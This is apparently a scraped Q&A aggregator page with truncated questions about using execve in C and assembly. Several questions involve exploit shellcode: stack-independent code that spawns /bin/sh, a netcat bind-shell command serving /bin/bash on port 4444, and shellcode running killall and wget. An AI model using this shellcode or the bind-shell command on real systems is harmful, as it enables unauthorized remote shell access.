execve

execve() failing to launch program in C

ぃ、小莉子 提交于 2021-02-19 06:16:08
问题 I am trying to spawn a new process using execve() from unistd.h on Linux. I have tried passing it the following parameters execve("/bin/ls", "/bin/ls", NULL); but get no result. I do not get an error either, the program just exits. Is there a reason why this is happening? I have tried launching it as root and regular user. The reason I need to use execve() is because I am trying to get it to work in an assembly call like so program: db "/bin/ls",0 mov eax, 0xb mov ebx, program mov ecx,

execve() failing to launch program in C

余生颓废 提交于 2021-02-19 06:15:40
问题 I am trying to spawn a new process using execve() from unistd.h on Linux. I have tried passing it the following parameters execve("/bin/ls", "/bin/ls", NULL); but get no result. I do not get an error either, the program just exits. Is there a reason why this is happening? I have tried launching it as root and regular user. The reason I need to use execve() is because I am trying to get it to work in an assembly call like so program: db "/bin/ls",0 mov eax, 0xb mov ebx, program mov ecx,

Pointer to string in stand-alone binary code without .data section

别来无恙 提交于 2021-02-04 19:43:06
问题 I'm trying to write kind of exploit and have a problem with making my asm code run anywhere on the stack. Here's it: BITS 64 global _start _start: mov rax, 59 jmp short file c1: pop rdi jmp short argv c2: pop rsi mov rdx, 0 syscall ret file: call c1 db '/bin/sh',0 argv: call c2 dq arg, 0 <- problem arg: db 'sh',0 This code won't work anywhere on the stack due to selected line because this code can be executed anywhere on the stack so nasm can't correctly compute arg's address. (This is a

execve() argv in GAS AT&T assembler

故事扮演 提交于 2021-01-27 14:40:43
问题 My code: .section .data name: .string "/bin/sh" args: .string "-c" .string "ls" .section .text .globl _start _start: pushq $0 pushq name movq $59, %rax movq %rsp, %rdi pushq $0 pushq args movq %rsp, %rsi movq $0, %rdx syscall I know that the second argument of execve is array of chars. How to do this in assembly avoiding this: execve("./payload", ["./payload"], 0x7ffc291fd160 /* 40 vars */) = 0 execve("/bin/sh", [0x736c00632d], NULL) = -1 EFAULT (Bad address) --- SIGSEGV {si_signo=SIGSEGV, si

Where do I find the assembly that creates a static variable in the .data section of my C program?

删除回忆录丶 提交于 2020-11-28 01:41:44
问题 First time poster. 2nd year CS student. I am exploring the creation of static variables in the .data section of the Virtual Address Space in the context of a C source->GCC compilation->Linux execution environment. C program is test.c int main() { register int i = 0; register int sum = 0; static int staticVar[10] = {1,2,3,4,5,6,7,8,9,-1}; Loop: sum = sum + staticVar[i]; //optimized away i = i+1; if(i != 10) goto Loop; return 0; } Asking GDB to ' disass /m ' reveals that there is no code for

What is proper way to call execve with arguments in assembly?

穿精又带淫゛_ 提交于 2020-01-24 11:17:50
问题 I am trying to execute the following with execve : /bin//nc -lnke /bin/bash -p 4444 When reading the man page for execve , I see the following requirements: int execve(const char *filename, char *const argv[], char *const envp[]); The issue I am running into is pushing arguments to argv ; I do not understand how you push an array (in assembly) for this to work properly. The assembly that I am currently using is below: global _start _start: xor eax, eax ; command push eax push 0x636e2f2f push

What is proper way to call execve with arguments in assembly?

安稳与你 提交于 2020-01-24 11:17:30
问题 I am trying to execute the following with execve : /bin//nc -lnke /bin/bash -p 4444 When reading the man page for execve , I see the following requirements: int execve(const char *filename, char *const argv[], char *const envp[]); The issue I am running into is pushing arguments to argv ; I do not understand how you push an array (in assembly) for this to work properly. The assembly that I am currently using is below: global _start _start: xor eax, eax ; command push eax push 0x636e2f2f push

execve(“/bin/sh”, 0, 0); in a pipe

折月煮酒 提交于 2019-12-21 03:58:15
问题 I have the following example program: #include <stdio.h> int main(int argc, char ** argv){ char buf[100]; printf("Please enter your name: "); fflush(stdout); gets(buf); printf("Hello \"%s\"\n", buf); execve("/bin/sh", 0, 0); } I and when I run without any pipe it works as it should and returns a sh promt: bash$ ./a.out Please enter your name: warning: this program uses gets() which is unsafe. testName Hello "testName" $ exit bash$ But this does not work in a pipe, i think I know why that is,

execve shellcode writing segmentation fault

断了今生、忘了曾经 提交于 2019-12-17 04:07:20
问题 I am trying to study execve shellcode, OS : Linux bt 2.6.39.4 root@bt:~/exploit# cat gshell.s .globl _start _start: nop jmp MyString shell: popl %esi xorl %eax,%eax movl %al,9(%esi) movl %esi,10(%esi) movl %eax,14(%esi) movb $11,%al movl %esi, %ebx leal 0xa(%esi),%ecx leal 0xe(%esi),%edx int $0x80 movl $1,%eax movl $0,%ebx int $0x80 MyString: call shell shellvar: .ascii "/bin/bashADDDDCCCC" root@bt:~/exploit# as -gstabs -o gshell.o gshell.s root@bt:~/exploit# ld -o gshell gshell.o root@bt:~

Shellcode: perform 2 execve() calls

独自空忆成欢 提交于 2019-12-12 21:21:54
问题 I am trying to write shellcode in assembly. I need to perform a /usr/bin/killall command AND a /usr/bin/wget command. I have both commands running perfectly in shellcode with the execve() syscall. But now I want to combine these 2, but this is not possible because the program exits when the first execve() call is executed. (from the man pages of execve() : execve() does not return on success). How can I perform 2 execve() calls? Or is there another way to call both /usr/bin/killall and /usr